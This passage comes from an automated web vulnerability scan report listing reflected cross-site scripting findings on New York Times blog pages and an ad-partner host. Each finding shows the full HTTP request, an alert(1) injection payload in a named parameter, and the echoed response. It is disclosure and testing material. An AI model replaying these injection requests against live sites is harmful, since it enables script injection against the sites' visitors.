GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick582d2"-alert(1)-"b947319b053&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFoun ...[SNIP]...
3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e573'-alert(1)-'e1385978014 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=12896112782e573'-alert(1)-'e1385978014&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88f77"-alert(1)-"167dad5fe8 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6747
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=128961127888f77"-alert(1)-"167dad5fe8&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12262'-alert(1)-'e4bd8929211 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto12262'-alert(1)-'e4bd8929211&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5 ...[SNIP]...
3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a865b"-alert(1)-"c0215a18d89 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:48:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... v8/3a51/7/129/%2a/z%3B231242665%3B0-0%3B0%3B55388564%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa865b"-alert(1)-"c0215a18d89&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/5 ...[SNIP]...
3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5739.NYTimes.com/B4990972.8
Issue detail
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0f6d'-alert(1)-'682c6ac4a6b was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5739.NYTimes.com/B4990972.8;click=d0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1 Accept: */* Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 489 Cache-Control: no-cache Pragma: no-cache Date: Sat, 13 Nov 2010 01:48:43 GMT Expires: Sat, 13 Nov 2010 01:48:43 GMT
document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/f7/%2a/i;44306;0-0;0;56070716;1-468/60;0/0/0;;~sscs=%3fd0f6d'-alert(1)-'682c6ac4a6b&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0 ...[SNIP]...
3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /2010/11/11/anatomy-of-a-scene-unstoppable/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51dfc"><script>alert(1)</script>7dc7045992c was submitted in the src parameter. This input was echoed as 51dfc\"><script>alert(1)</script>7dc7045992c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/11/anatomy-of-a-scene-unstoppable/?src=dayp51dfc"><script>alert(1)</script>7dc7045992c HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.nytimes.com/
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:51:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 71408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... 6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;anatomy-of-a-scene;chris-pine;denzel-washington;movies;tony-scott;unstoppable&src=dayp51dfc\"><script>alert(1)</script>7dc7045992c"> ...[SNIP]...
3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c201f"><script>alert(1)</script>e276354bf82 was submitted in the src parameter. This input was echoed as c201f\"><script>alert(1)</script>e276354bf82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?src=twrc201f"><script>alert(1)</script>e276354bf82 HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.nytimes.com/timeswire/index.html?src=hp1-0-R
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:48:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... Now4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;featured;hip-hop;kanye-west;matt-lauer;music;television;today&src=twrc201f\"><script>alert(1)</script>e276354bf82"> ...[SNIP]...
3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /2010/11/12/the-week-in-culture-pictures-nov-12/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 521ab"><script>alert(1)</script>70bd4e176f0 was submitted in the src parameter. This input was echoed as 521ab\"><script>alert(1)</script>70bd4e176f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-week-in-culture-pictures-nov-12/?src=twr521ab"><script>alert(1)</script>70bd4e176f0 HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:48:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 69357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;arts-general;week-in-culture-pictures&src=twr521ab\"><script>alert(1)</script>70bd4e176f0"> ...[SNIP]...
3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/art-design/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9f6"><script>alert(1)</script>58f86990e4f was submitted in the REST URL parameter 2. This input was echoed as 1e9f6\"><script>alert(1)</script>58f86990e4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/art-design1e9f6"><script>alert(1)</script>58f86990e4f/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/art-design1e9f6\"><script>alert(1)</script>58f86990e4f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/arts-general/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70f0"><script>alert(1)</script>c5a9dd137e4 was submitted in the REST URL parameter 2. This input was echoed as f70f0\"><script>alert(1)</script>c5a9dd137e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/arts-generalf70f0"><script>alert(1)</script>c5a9dd137e4/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/arts-generalf70f0\"><script>alert(1)</script>c5a9dd137e4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/books/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2af69"><script>alert(1)</script>bb647269876 was submitted in the REST URL parameter 2. This input was echoed as 2af69\"><script>alert(1)</script>bb647269876 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/books2af69"><script>alert(1)</script>bb647269876/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/books2af69\"><script>alert(1)</script>bb647269876&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/classical-music/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd77"><script>alert(1)</script>6d4e36739ac was submitted in the REST URL parameter 2. This input was echoed as ddd77\"><script>alert(1)</script>6d4e36739ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/classical-musicddd77"><script>alert(1)</script>6d4e36739ac/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:07 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/classical-musicddd77\"><script>alert(1)</script>6d4e36739ac&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/dance/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0f7"><script>alert(1)</script>7745ad10317 was submitted in the REST URL parameter 2. This input was echoed as ad0f7\"><script>alert(1)</script>7745ad10317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/dancead0f7"><script>alert(1)</script>7745ad10317/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:10 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
